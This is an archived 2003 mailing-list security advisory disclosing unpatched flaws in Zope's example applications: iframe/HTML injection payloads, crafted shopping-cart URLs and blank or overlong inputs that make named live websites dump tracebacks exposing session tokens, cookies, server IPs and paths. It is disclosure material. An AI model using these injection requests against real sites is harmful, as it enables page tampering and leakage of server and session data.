lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE47ORIsSqZWd0003acb5@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Zope

-= 0day - Freedom of Voice - Freedom of Choice =-

------------------------------------------------------------------
          - EXPL-A-2003-009 exploitlabs.com Advisory 009
------------------------------------------------------------------
                   -=- The DoPe on zOpE -=-



Donnie Werner
June 19, 2003
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt


Product:
--------
Zope -=- open source application server
http://www.zope.com/


Vunerability(s):
================

1  - Empty Upload ( physical location dump ) -=-
/Examples/FileLibrary/addFile
2  - Html / js injection -=- /Examples/db/
3  - Blank Query -=- /Examples/ShoppingCart
3a - iframe Query ( Html/js injection ) -=-
/Examples/ShoppingCart/addItems
3b - Unchecked Input Lenght -=- /Examples/ShoppingCart/addItems
3c - Unchecked Characters -=- /Examples/ShoppingCart/addItems

Remote:
-------
yup


not vurlnerable to #1 ( blank upload )
-----------------------------------
examples..

http://www.aixtraware.de/TCPware/Examples
Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86),
python 2.1.3, linux2) ZServer/1.1b1

http://ispg.csu.edu.au
Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python
2.1.3, freebsd4) ZServer/1.1b1

http://www.jungle2.org
Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3,
openbsd3) ZServer/1.1b1


vurlnerable
-----------
Example URLS - #1:


http://klever.multimedia.fh-augsburg.de
Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python
2.1.3, linux2) ZServer/1.1b1

http://grlug.org/
Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_fastcgi/2.2.12
mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26

http://grlug.org/zope/Examples/FileLibrary/addFile


Error...

Zope has encountered an error while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.

Troubleshooting Suggestions

The URL may be incorrect.
The parameters passed to this resource may be incorrect.
A resource that this resource relies on may be encountering an error.
For more detailed information about the error, please refer to the
HTML source for this page.

If the error persists please contact the site maintainer. Thank you
for your patience.


Traceback (innermost last):
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150,
in publish_module
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114,
in publish
  File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in
zpublisher_exception_hook
    (Object: FileLibrary)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98,
in publish
  File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88,
in mapply
    (Object: addFile)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39,
in call_object
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 252, in __call__
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 283, in _bindAndExec
    (Object: addFile)
  File
/usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 302, in _exec
    (Object: addFile)
    (Info: ({'script': <PythonScript instance at 8c23a90>, 'context':
<Folder instance at 89548e0>, 'container': <Folder instance at
89548e0>, 'traverse_subpath': []}, (<ZPublisher.HTTPRequest.FileUpload
instance at 0x8b2eba4>,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236,
in _setObject
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53,
in checkValidId
    (Object: Files)
Bad Request: (see above)



Example-1.2:

http://www.pitch.com
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_fastcgi/2.2.12

/Examples/FileLibrary/addFile


Site Error
An error was encountered while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.
Traceback

  Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
    (Object: addFile)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
    (Object: addFile)
  File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
    (Object: addFile)
    (Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, (,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in
_setObject
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in
checkValidId
    (Object: Files)
Bad Request: Empty or invalid id specified.

======================================================================
==========================
======================================================================
==========================




Example-2.1:

http://www.c-media.com.au/Examples/db/ExampledbBrowseReport
http://198.78.66.174:8080/Examples/


exploit:
--------
edit the "discription" field for html / js injection

<iframe src=http://somesite.com</iframe>

viewing of the existing databse is rendered useless


======================================================================
==========================
======================================================================
==========================



Example-3:

http://www.sfweekly.com/Examples/ShoppingCart


enter a blank as a quanity entry

http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

Site Error
An error was encountered while publishing this resource.

Error Type: ValueError
Error Value: invalid literal for int():

Traceback

  Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
    (Object: addItems)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
    (Object: addItems)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
    (Object: addItems)
  File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
    (Object: addItems)
    (Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, ([id: '510-007', quantity: '', id: '510-122',
quantity: '0', id: '510-115', quantity: '0'], formorders [id:
'510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115',
quantity: '0'] cookies_ZopeId '23329946A0z9drL5xZk' Apache
'12.230.1.165.260541049326654641' lazy itemsother_ZopeId
'23329946A0z9drL5xZk' orders [id: '510-007', quantity: '', id:
'510-122', quantity: '0', id: '510-115', quantity: '0'] Apache
'12.230.1.165.260541049326654641' SESSION id: 10531690730759726137,
token: 23329946A0z9drL5xZk, contents: [('items', {})] traverse_subpath
[] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san') PUBLISHED <PythonScript instance at 9e01660> URL
'http://www.sfweekly.com/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts' URL0
http://www.sfweekly.com/Examples/ShoppingCart/addItems URL1
http://www.sfweekly.com/Examples/ShoppingCart URL2
http://www.sfweekly.com/Examples URL3 http://www.sfweekly.com BASE0
http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2
http://www.sfweekly.com/Examples BASE3
http://www.sfweekly.com/Examples/ShoppingCart BASE4
http://www.sfweekly.com/Examples/ShoppingCart/addItems
environDOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR
'63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME
'/home/httpd/fastcgi/slave3' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT
'80' PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/Examples/ShoppingCart/addItems' source 'slave3' UNIQUE_ID
'PsYVuD-xh80AAEv9Xno' HTTP_ACCEPT_LANGUAGE 'en-us' REMOTE_ADDR
'12.229.234.100' SERVER_NAME 'www.sfweekly.com' HTTP_CONNECTION
'Keep-Alive' HTTP_USER_AGENT 'Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; USER AGENT)' HTTP_ACCEPT 'image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/x-shockwave-flash, */*'
REQUEST_URI
'/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qu
antity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecord
s=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0' PATH
'/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin' QUERY_STRING
'orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Are
cords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&
orders.quantity%3Arecords=0' SERVER_PROTOCOL 'HTTP/1.1' SCRIPT_URL
'/Examples/ShoppingCart/addItems' HTTP_HOST 'www.sfweekly.com'
REQUEST_METHOD 'GET' SERVER_SIGNATURE '' SCRIPT_URI
'http://www.sfweekly.com/Examples/ShoppingCart/addItems' SCRIPT_NAME
'' SITE 'san' SERVER_SOFTWARE 'Apache/1.3.27 (Unix) (Red-Hat/Linux)
mod_fastcgi/2.2.12' SERVER_ADMIN 'webadmin@...times.com' PATH_INFO
'/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Example
s/ShoppingCart/addItems' HTTP_COOKIE
'Apache=12.230.1.165.260541049326654641;
_ZopeId="23329946A0z9drL5xZk"' REMOTE_PORT '21891' HTTP_REFERER
'http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Are
cords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&
orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantit
y%3Arecords=0' ), {}, (None,)))
  File Script (Python), line 11, in addItems
ValueError: invalid literal for int():
----------------------------------------------------------------------
----------
----------------------------------------------------------------------
----------
orders [id: '510-007', quantity: '0', id: '510-122', quantity: '', id:
'510-115', quantity: '0']
orders [id: '510-007', quantity: '0', id: '510-122', quantity: 'test',
id: '510-115', quantity: '0']
----------------------------------------------------------------------
----------
----------------------------------------------------------------------
----------




example 3a:
-----------

this i love...

insert a iframe into the unchecked length quanity field


<iframe src="http://ebay.com"></iframe>
<iframe src=http://ebay.com
<iframe src="http://ebay.com

http://www.jungle2.org/Examples/ShoppingCart
http://www.westword.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com%3C%2Fiframe%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0


<iframe src=http://ebay.com

GET
/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qua
ntity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com&orders.id%3Areco
rds=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&or
ders.quantity%3Arecords=0

HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://www.westword.com/Examples/ShoppingCart/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER
AGENT)
Host: www.westword.com
Cookie: Apache=12.229.228.51.196431047271232157;
_ZopeId="50159375A0z9pTTmVlU"


Post injection url analysis:
----------------------------

puts this URL in a second frame before the main ebay.com frame,
injecting
and appending the original info to the exterlal url reference
resulting in 2 iframes as evidenced by:

<iframe src=http://ebay.com/


http://ebay.com/',

http://ebay.com',%20id:%20'510-122',%20quantity:%20'0',%20id:%20'510-115',%20quantity:%20'0'],%20<h3>form</h3><table><tr%20valign=


<iframe src=http://ebay.com

http://ebay.com',/
http://ebay.com/


<iframe src="http://ebay.com"></iframe>
http://ebay.com/


Example 3b - 3c:
---------------- 

Sending any string longer that 11 characters in the quanity field
causes a dump.


details here...

http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

reveal these items..

SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc,
contents: []

SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san')
PUBLISHED <PythonScript instance at 96c4040>
URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts'
URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart
URL2 http://www.sfweekly.com/calendar/Examples
URL3 http://www.sfweekly.com/calendar
URL4 http://www.sfweekly.com
BASE0 http://www.sfweekly.com
BASE1 http://www.sfweekly.com
BASE2 http://www.sfweekly.com/calendar
BASE3 http://www.sfweekly.com/calendar/Examples
BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart
BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
environ
DOCUMENT_ROOT '/home/nti/htdocs/san'
SERVER_ADDR '63.241.135.221'
HTTP_ACCEPT_ENCODING 'gzip, deflate'
SCRIPT_FILENAME '/home/httpd/fastcgi/slave2'
GATEWAY_INTERFACE 'CGI/1.1'
SERVER_PORT '80'
PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/calendar/Examples/ShoppingCart/addItems'
source 'slave2'
UNIQUE_ID 'Pt02bz-xh80AAC79HHU'



===================================================================
extra notes
===================================================================
Update of
/cvs-repository/Releases/Zope/lib/python/Products/PythonScripts
In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts

Modified Files:
 Utility.py module_access_examples.py
Log Message:
Merge evan-modsec_fix-branch


=== Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 =>
1.5 ===
 __version__='$Revision$'[11:-2]

-from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
-from Globals import InitializeClass
-import string
-
-def allow_module(module_name):
-    """Allow a module and all its contents to be used from a
-    restricted Script. The argument module_name may be a simple
-    or dotted module or package name. Note that if a package
-    path is given, all modules in the path will be available."""
-    ModuleSecurityInfo(module_name).setDefaultAccess(1)
-    dot = string.find(module_name, '.')
-    while dot > 0:
-        ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1)
-        dot = string.find(module_name, '.', dot + 1)
-
-def allow_class(Class):
-    """Allow a class and all of its methods to be used from a
-    restricted Script.  The argument Class must be a class."""
-    Class._security = sec = ClassSecurityInfo()
-    sec.declareObjectPublic()
-    sec.setDefaultAccess(1)
-    sec.apply(Class)
-    InitializeClass(Class)
+# These have been relocated, and should be imported from
AccessControl

+from AccessControl import allow_module, allow_class


===
Releases/Zope/lib/python/Products/PythonScripts/module_access_examples
.py 1.1 => 1.2 ===
 '''

-from Products.PythonScripts.Utility import allow_module, allow_class
+from AccessControl import allow_module, allow_class, allow_type
 from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
 from Globals import InitializeClass

@@ -42,9 +42,9 @@
 # ModuleSecurityInfo('re').declarePublic('compile', 'findall',
 #   'match', 'search', 'split', 'sub', 'subn', 'error',
 #   'I', 'L', 'M', 'S', 'X')
-# from re import RegexObject, MatchObject
-# allow_class(RegexObject)
-# allow_class(MatchObject)
+# import re
+# allow_type(type(re.compile('')))
+# allow_type(type(re.match('x','x')))

 # ModuleSecurityInfo('StringIO').declarePublic('StringIO'





Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
info@...e.com - Concurrent with this advisory


Credits:
--------

Donnie Werner
http://exploitlabs.com "finding your holes"
morning_wood@...me4.com - get tested


----------------------------------------------------------------------
---
be a good vendor... test your products first, it is your problem, fix
it.
http://nothackers.org - it's t0day
----------------------------------------------------------------------
---

_______________________________________________
0day mailing list
0day@...hackers.org
http://nothackers.org/mailman/listinfo/0day

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ